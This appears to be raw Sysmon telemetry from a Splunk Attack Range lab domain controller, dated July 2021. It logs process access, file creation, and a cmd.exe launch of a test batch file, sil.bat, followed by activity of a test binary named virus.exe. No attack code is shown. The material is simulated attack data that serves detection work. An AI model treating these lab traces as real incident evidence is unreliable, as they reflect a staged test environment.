07:57:17.012{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050908Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.012{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050907Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.012{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050906Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.012{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050905Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.012{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050904Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.012{466BC892-32D3-60E8-770B-00000000CF01}635610048C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+18cf7c|C:\Windows\System32\SHELL32.dll+18ccd3|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050903Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:16.961{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" "C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001050959Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:18.465{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56E5BD55DA54911BA3EE1B285808B301,SHA256=B943DAAE69A0A45A10E66DA71B01A0BC95E063465F48BAB580CA329F888EF2ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808441Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:18.056{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8D0D54587B4B3A4291DD56C0DF281C2,SHA256=0B06F6F92406AB3EB6CC228AD43B48770623B57D8C4D178036F79363102315DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050958Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:18.349{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051030Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.802{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=049881D97DB9CF782F39B01BF42573F3,SHA256=B668B645DE0F05137DBE09B29C7CC6AE08EF8846A697087561CA8E06CFC94A66,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001051029Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.787{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F92893837BF3A779E84802DA8970A28,SHA256=5D27F1E1C42D69E371D6D870BCA4E113EDCFBB427BB42E79B5DEC191A2B80A36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808442Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:19.072{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6714E65966AAD1F1A087BBAE99023CA7,SHA256=E2A2DFF300925B8B2C092EF5BA76614ADCBFE56D0DF97FD313CF5191B265C0B4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051028Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.328{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5DF-60EB-7E7D-00000000CF01}9640C:\temp\test\virus.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051027Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.328{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5DF-60EB-7E7D-00000000CF01}9640C:\temp\test\virus.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051026Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.313{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5DF-60EB-7F7D-00000000CF01}7240C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051025Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.313{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5DF-60EB-7F7D-00000000CF01}7240C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051024Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.313{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5DF-60EB-7E7D-00000000CF01}9640C:\temp\test\virus.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051023Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.313{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5DF-60EB-7E7D-00000000CF01}9640C:\temp\test\virus.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051022Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.313{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5DF-60EB-7E7D-00000000CF01}9640C:\temp\test\virus.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051021Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.291{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5DF-60EB-7F7D-00000000CF01}7240C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051020Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.291{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5DF-60EB-7F7D-00000000CF01}7240C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001051019Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.291{466BC892-F5DF-60EB-7F7D-00000000CF01}72407868C:\Windows\system32\conhost.exe{466BC892-F5DF-60EB-7E7D-00000000CF01}9640C:\temp\test\virus.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051018Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5DF-60EB-7F7D-00000000CF01}7240C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051017Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051016Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.260{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051015Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051014Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.260{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051013Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051012Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051011Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.260{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051010Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051009Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.260{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051008Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051007Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
